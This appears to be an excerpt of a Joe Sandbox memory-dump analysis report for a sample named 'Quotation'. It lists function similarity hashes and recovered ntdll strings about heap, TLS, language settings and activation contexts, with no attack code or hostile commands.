                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                              • API String ID: 0-1340214556
                                                              • Opcode ID: aff9436967809f0f8653009c61d67b37fe10e7d25f4f50e19fbaf9c60e7c10ad
                                                              • Instruction ID: 0d797e37c301ac394449bfef0efbbc37af0ed5c6bff5754e9350475f5fc9d470
                                                              • Opcode Fuzzy Hash: aff9436967809f0f8653009c61d67b37fe10e7d25f4f50e19fbaf9c60e7c10ad
                                                              • Instruction Fuzzy Hash: 04512475A00784EFE312CBA8D994FAABBF8FF49744F0405A0E5808F6A2D774E911CB50
                                                              Strings
                                                              • minkernel\ntdll\ldrtls.c, xrefs: 33EC1B4A
                                                              • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 33EC1B39
                                                              • LdrpAllocateTls, xrefs: 33EC1B40
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                              • API String ID: 0-4274184382
                                                              • Opcode ID: b59c2c2142a94331d81b68ea93ec0b7225d4ff5973ab21fb0e239245123b04e1
                                                              • Instruction ID: 44cc64d2abf9a5bdf0dc8048ca7c9459afcd28d246c3841ac6ddb2148dbc81d4
                                                              • Opcode Fuzzy Hash: b59c2c2142a94331d81b68ea93ec0b7225d4ff5973ab21fb0e239245123b04e1
                                                              • Instruction Fuzzy Hash: 804198B9E11648EFDB01CFA8C940AAEBBF5FF48714F448119E40AAB650DB75A800CB90
                                                              Strings
                                                              • PreferredUILanguages, xrefs: 33F0C212
                                                              • @, xrefs: 33F0C1F1
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 33F0C1C5
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                               • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                              • API String ID: 0-2968386058
                                                              • Opcode ID: 2025c4ff667f6dfbf085c99c9a32b6c8ed6bcc93144b8c9c65b487782d9d22d1
                                                              • Instruction ID: d83c22e6e37b5875245fa0a88383746ee3203936bedf1e929f751675b8471c8d
                                                              • Opcode Fuzzy Hash: 2025c4ff667f6dfbf085c99c9a32b6c8ed6bcc93144b8c9c65b487782d9d22d1
                                                              • Instruction Fuzzy Hash: 5A418276E1020AEBDB01CBD8C880FDEB7BCAB04744F94446AE915FB690D7749A44DF90
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                              • API String ID: 0-1373925480
                                                              • Opcode ID: 609f2f2cdb87d26096a150fbf590ebd598e5464f092245ad0d20fd5f9dd6937f
                                                              • Instruction ID: d225fbdce5f35d828fa31afc64f294042cdb27c63a41782a95e529d98c17df33
                                                              • Opcode Fuzzy Hash: 609f2f2cdb87d26096a150fbf590ebd598e5464f092245ad0d20fd5f9dd6937f
                                                              • Instruction Fuzzy Hash: 4141D076D11758CBEB12CBA5C850B9DB7B8EF49384F15045AD940EBB91DB349981CF10
                                                              Similarity
                                                              • API ID:
                                                              • String ID: PS3$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                              • API String ID: 0-1075811216
                                                              • Opcode ID: c45903050ca8d341691bae07a941ee8323e17d788c71565b7995627ca32487a0
                                                              • Instruction ID: 2e9d9d0fa45535f00d58e9299fc3b24eccb13353d4d228388d1d820889a49459
                                                              • Opcode Fuzzy Hash: c45903050ca8d341691bae07a941ee8323e17d788c71565b7995627ca32487a0
                                                              • Instruction Fuzzy Hash: B441AC75A04749DFEB12CF69C880B6E77B4FF94748F2440A9ED00DB2A1EA75E900CB91
                                                              Strings
                                                              • SXS: %s() passed the empty activation context data, xrefs: 33EC29FE
                                                              • RtlCreateActivationContext, xrefs: 33EC29F9
                                                              • Actx , xrefs: 33E833AC
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                              • API String ID: 0-859632880
                                                              • Opcode ID: 6232a9eb2cb0111c06e4ce1cf1d34a0ecbac615466a6400d7f001d601841d02c
                                                              • Instruction ID: 9f7dacb7163710ff776ef0582d6cc0b745abbd8f7ecd431154405ee248e683cf
                                                              • Opcode Fuzzy Hash: 6232a9eb2cb0111c06e4ce1cf1d34a0ecbac615466a6400d7f001d601841d02c
                                                              • Instruction Fuzzy Hash: 1631123AA10345DFEF26CF58D880B9A77A5EB44B24F554469EC0CDF2A2CB70D852CB90
                                                              Strings
                                                              • LdrpInitializationFailure, xrefs: 33ED20FA
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 33ED2104
                                                              • Process initialization failed with status 0x%08lx, xrefs: 33ED20F3
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2986994758
                                                              • Opcode ID: 2ee3be8c2aa6c56ee408c6a32ad13355900959be76fe3797e91c020d7b712c9a
                                                              • Instruction ID: 1d3ed4fd780c16f1c9c130a68141dff755ffd7ab7b06c74807d53f3ff1eaa96f
                                                              • Opcode Fuzzy Hash: 2ee3be8c2aa6c56ee408c6a32ad13355900959be76fe3797e91c020d7b712c9a
                                                              • Instruction Fuzzy Hash: 87F0F675901308BFE710E649CD52FD937B8EB41758F9404A9F640B7681D6F0E942CE91
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: #%u
                                                              • API String ID: 48624451-232158463
                                                              • Opcode ID: 66092f1234361b18ff7165a41460f9276d1a7421c7b61dd9e8e1f7cc0d58a98d
                                                              • Instruction ID: 180be8be9aacfa47cf7664bc1a8cb81094c9f64c43d716c0962afe7ce0efeb4d
                                                              • Opcode Fuzzy Hash: 66092f1234361b18ff7165a41460f9276d1a7421c7b61dd9e8e1f7cc0d58a98d
                                                              • Instruction Fuzzy Hash: 84711A72E102499FDB01CFA8C990BAEB7F8EF08748F154065E905A7651EB38ED41CBA1
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: kLsE
                                                              • API String ID: 3446177414-3058123920
                                                              • Opcode ID: b39dcd5ca4c7d0f2cab37a521c2232b92a4654279da5da3aa94a7229b8742c99
                                                              • Instruction ID: 8dac1800d09acadde6504442485133c4d17c1a0ddcd65a5540fed32071f3c563
                                                              • Opcode Fuzzy Hash: b39dcd5ca4c7d0f2cab37a521c2232b92a4654279da5da3aa94a7229b8742c99
                                                              • Instruction Fuzzy Hash: 2A4157729113404BE710BB60C8A0B653BF4AB507A8FD50629FC50BA1C1CBF688C7D7E0
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@
                                                              • API String ID: 0-149943524
                                                              • Opcode ID: 72157e787937d3837d61f0a82597f5036e227e8258bfefdaef129caac2638466
                                                              • Instruction ID: 2b4bca78a742ccba90027af0216ac37fd2ee2dab368b7972dc5fb91535586f40
                                                              • Opcode Fuzzy Hash: 72157e787937d3837d61f0a82597f5036e227e8258bfefdaef129caac2638466
                                                              • Instruction Fuzzy Hash: B732AEB86483118BDB14CF14C48076EB7F5EF8878CF58492EF9A59B6A0E734D944CB92
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: b30e4b250a2e84f0b7c8104c216b797b36f3258a089db730cb8803ac008fec14
                                                              • Instruction ID: 79ca7fc58996d893430e528ef6d9a40bb5c9a4cb5d46916fa4433b2f8b9a7488
                                                              • Opcode Fuzzy Hash: b30e4b250a2e84f0b7c8104c216b797b36f3258a089db730cb8803ac008fec14
                                                              • Instruction Fuzzy Hash: 5231CE35615B02EFEB429B60CA80A8AFBB9FF44358F441025E95197EA0DB74F920CBD0
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `$`
                                                              • API String ID: 0-197956300
                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction ID: a150dbf9013359fb86cdfacef0ad9b1acb68e8546704c743ba75374fe62b00b7
                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction Fuzzy Hash: 85C10072A183429BEB10CF24D840B6BBBE5AFC4358F884F2CF995CA290D775D525CB81
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Legacy$UEFI
                                                              • API String ID: 2994545307-634100481
                                                              • Opcode ID: b96046da3e31fbed4bc5277fd15e5d7aba32fb6ba05a6cbdf287aaece2db7f9b
                                                              • Instruction ID: 013cf80da662ae539d9de3079b6a1ea8ceab73f5713913eeb31ac84095ef678d
                                                              • Opcode Fuzzy Hash: b96046da3e31fbed4bc5277fd15e5d7aba32fb6ba05a6cbdf287aaece2db7f9b
                                                              • Instruction Fuzzy Hash: 55615CB2E003489FEB14CFA88940BADBBB9FB84345F54407DE558EB261DB31A940CB50
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: $$$
                                                              • API String ID: 3446177414-233714265
                                                              • Opcode ID: 7f8ff3a0a89b60ae2585001d774d5dc8182e2c9cd5925630d395df0defcb3a7d
                                                              • Instruction ID: b8205657c8f6100974f31510099487a47d605583ce75667edfdf37fef877f717
                                                              • Opcode Fuzzy Hash: 7f8ff3a0a89b60ae2585001d774d5dc8182e2c9cd5925630d395df0defcb3a7d
                                                              • Instruction Fuzzy Hash: ED61BA75E44749DFEB20DFA4C580BA9B7B1BF4430CF4446A9E514ABA41CB74A982CB90
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .Local\$@
                                                              • API String ID: 0-380025441
                                                              • Opcode ID: 3ee6bdde1517083dc076ceaaf7560974690cd8d5425236c4a6fca06e732d4333
                                                              • Instruction ID: 8412085f1accd025c554bf72d783b8a30dd39c0321ef57d92d8bbf845e284513
                                                              • Opcode Fuzzy Hash: 3ee6bdde1517083dc076ceaaf7560974690cd8d5425236c4a6fca06e732d4333
                                                              • Instruction Fuzzy Hash: 333186759497049FD311CF28C480A5FBBF8EB85A54F48092EF9EC97650DA34ED04CB92
                                                              Similarity
                                                              • API ID:
                                                              • String ID: MUI
                                                              • API String ID: 0-1339004836
                                                              • Opcode ID: f8f9bc5d2b98f32e5829cb424502be01abf5de75d049fcbc88273f843131fdc2
                                                              • Instruction ID: c37161aacab5a90d53719f878d58421f2c8695b5746f1c6108bdf68a455d80b6
                                                              • Opcode Fuzzy Hash: f8f9bc5d2b98f32e5829cb424502be01abf5de75d049fcbc88273f843131fdc2
                                                              • Instruction Fuzzy Hash: 61824A79E003298FFB14CFA9C890BDEB7B5BF48354F548169E859AB250DB30D985CB50
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 763c8a2a285b4e34188ea865e8763a01cd728fc2a5ff2f113655ad7a5eb532d9
                                                              • Instruction ID: 83bfdb8b84d8f4eebc1d4a1f264df5119aa86ff822ea88b76be89881a6e9304f
                                                              • Opcode Fuzzy Hash: 763c8a2a285b4e34188ea865e8763a01cd728fc2a5ff2f113655ad7a5eb532d9
                                                              • Instruction Fuzzy Hash: 3F22E2B82047518FEB14CF29C090776B7F1AF44B48F4A849AD8C68F285E7B6E552DF60
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 3d4bc041b7b30e0d4d24f7390f11d1a2b19e1d7635d062f72373964c299574f3
                                                              • Instruction ID: 8e06a99dbd9f30fe7c5040e738ee05f5e48e738bddab1230fbd1f9b0e4e91dec
                                                              • Opcode Fuzzy Hash: 3d4bc041b7b30e0d4d24f7390f11d1a2b19e1d7635d062f72373964c299574f3
                                                              • Instruction Fuzzy Hash: 21B1F3B55093408FE754CF28C980A5ABBF1BF88308F584A6EF899DB351D771E946CB42
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 339d545e540d4a3d991f4090d1c325954363f12227128e48a9fad3b2fc92fd9a
                                                              • Instruction ID: 03bba88e3bf36fae2f6b7e733a81cca5f8c1379318780cb95c854c1113557b36
                                                              • Opcode Fuzzy Hash: 339d545e540d4a3d991f4090d1c325954363f12227128e48a9fad3b2fc92fd9a
                                                              • Instruction Fuzzy Hash: 0BA169B5A08341CFE311CF28C480A1ABBFABF88358F14496EF58597350EB70E955CB92
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6f978cc5734d6c0025841b6940023dd334165395c5e90ae538c095c0655d9a01
                                                              • Instruction ID: f2dc9e7e05f823a70994acfc921723eb8c64fc33099088f56bb5c56efe49f9d3
                                                              • Opcode Fuzzy Hash: 6f978cc5734d6c0025841b6940023dd334165395c5e90ae538c095c0655d9a01
                                                              • Instruction Fuzzy Hash: 46617075E04606EFEB08CF68C490A9DFBB5FF88344F18816AE419A7340DB34A951DBD0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 83a1c727bb1138c7eb4435a34613b2ca373f41d91918b5d228d8d606b3f0c634
                                                              • Instruction ID: f09fcada5f43f849abbd327ef02b558dce64a20b42d1db89a086da03e360bec9
                                                              • Opcode Fuzzy Hash: 83a1c727bb1138c7eb4435a34613b2ca373f41d91918b5d228d8d606b3f0c634
                                                              • Instruction Fuzzy Hash: 05419FB69183409FD320DF29C844B9BBBE8FF88265F404A2EF598D7251DB749905CBD2
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 74e2c5c67453cba84aef0faccd5852ebfb3131dd392155d2bff51d1c39ca256c
                                                              • Instruction ID: ab846cc17c9fb3c4998b1513a4f1e73a04c9733b932c9a35dccc681ae9f9b411
                                                              • Opcode Fuzzy Hash: 74e2c5c67453cba84aef0faccd5852ebfb3131dd392155d2bff51d1c39ca256c
                                                              • Instruction Fuzzy Hash: 75319C39A19B09FFEB428B24DA40A99BBB6FF84344F445025E95187F60DB34F830CB80
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: c1e8a529206e57ee6a4b44eb323f7d1ee31fabf32e67fe78c3384b7c68ceeee3
                                                              • Instruction ID: 177a68858f635f8c75ceb263aa2c857e5bc8dd5cfc24b85f38cfc2f630b3042b
                                                              • Opcode Fuzzy Hash: c1e8a529206e57ee6a4b44eb323f7d1ee31fabf32e67fe78c3384b7c68ceeee3
                                                              • Instruction Fuzzy Hash: C3F0FA32208340ABD7319B09DC04F8BBBFDEF89B14F080118B542A34A0E7A0B909C6A0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: GlobalTags
                                                              • API String ID: 0-1106856819
                                                              • Opcode ID: 1697f7a004a247f25bfbe25f638fab0a08d3b4b5f4f3d1df8f482718bb92aa29
                                                              • Instruction ID: 7828112170993ab2ea40eb5e99e3db68c4e53a729c9e36f78d0d428504092680
                                                              • Opcode Fuzzy Hash: 1697f7a004a247f25bfbe25f638fab0a08d3b4b5f4f3d1df8f482718bb92aa29
                                                              • Instruction Fuzzy Hash: 74718FB9E0034ADFDB18CF98C6906DEBBB1BF48754F18852EE845AB340DB759901CB60
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                              • Instruction ID: 5b35521f27301570ab003e6887145f266a204a60b6be9d2271597000320651b7
                                                              • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                              • Instruction Fuzzy Hash: 4B6138B5D05319ABEF11CFA9C840BDEBBB8FF84754F144169F810AB290D7749A01CBA0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                              • Instruction ID: 1474bfc39ee992e442d187cc7bc75ae392c2879bd7609f93ba88625543b91b9d
                                                              • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                              • Instruction Fuzzy Hash: 5551DDB2A14305AFE711CF54C850F9BB7F8FB84754F440A29B9809B690D774ED06CB92
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: EXT-
                                                              • API String ID: 0-1948896318
                                                              • Opcode ID: ab8582fa8f7f993f90411a89f1f7bda321ba3af41daa9e149d475a863fc9555b
                                                              • Instruction ID: 657c073285f9fc5f29616cee21646d9959a2b78004e93f6828cd5dd747544b90
                                                              • Opcode Fuzzy Hash: ab8582fa8f7f993f90411a89f1f7bda321ba3af41daa9e149d475a863fc9555b
                                                              • Instruction Fuzzy Hash: 164190B69683019BD710CB74CA40B5BB7E8AFC875CF44092DF584E71A0EA74EA04C792
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: PreferredUILanguages
                                                              • API String ID: 0-1884656846
                                                              • Opcode ID: e82e23e6efbafc5f583c32d02b472476d9bf02660acdf5544753aea590da636d
                                                              • Instruction ID: abb0526358385a46f319f56ac10b05e09f7d78f13ca5a537c01d34050e313729
                                                              • Opcode Fuzzy Hash: e82e23e6efbafc5f583c32d02b472476d9bf02660acdf5544753aea590da636d
                                                              • Instruction Fuzzy Hash: D2410476D1031AABDB01CAA8C840BEE73B9EF44754FA10976E811E7290D6B0DE40CFA0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryHash
                                                              • API String ID: 0-2202222882
                                                              • Opcode ID: 80b91801924dbb91085987f122c11a21a249e7341d5699a2c13d50392597134e
                                                              • Instruction ID: 0a7e4dcf09126c1d49244c3665b67ec7f11e99015a3b49e4237e286438bd5696
                                                              • Opcode Fuzzy Hash: 80b91801924dbb91085987f122c11a21a249e7341d5699a2c13d50392597134e
                                                              • Instruction Fuzzy Hash: 664163B2D1126CABEB21CB60CD80FDE777CEB45714F0045A5EA08AB140DB709E898FA4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: verifier.dll
                                                              • API String ID: 0-3265496382
                                                              • Opcode ID: 16fa7bc0a7dcacff04c218e1e3b1e385cfa495dd630180da8e82752ab057a173
                                                              • Instruction ID: 9284d04bbbcfc4b59db89e33d753b1c68dea03632e9f973468c4eeb4a0e75cf3
                                                              • Opcode Fuzzy Hash: 16fa7bc0a7dcacff04c218e1e3b1e385cfa495dd630180da8e82752ab057a173
                                                              • Instruction Fuzzy Hash: A83193BDB103019FD714AF29DC60AA677F5EB49B58F94843AF548DF281EA318D82C790
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Flst
                                                              • API String ID: 0-2374792617
                                                              • Opcode ID: 5e03ac810bff21284e0836a05232574499d56ff8eb43d37cdaccb9df1d25ff89
                                                              • Instruction ID: 73cb2917dc0ce945a9a7a97e1496571514094d9094115810f1934b04c3083408
                                                              • Opcode Fuzzy Hash: 5e03ac810bff21284e0836a05232574499d56ff8eb43d37cdaccb9df1d25ff89
                                                              • Instruction Fuzzy Hash: DD41A9B9A053019FD704CF28C580A1AFBE4EB49B14F54816EE49D8F291EB72D942CB91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Actx
                                                              • API String ID: 0-89312691
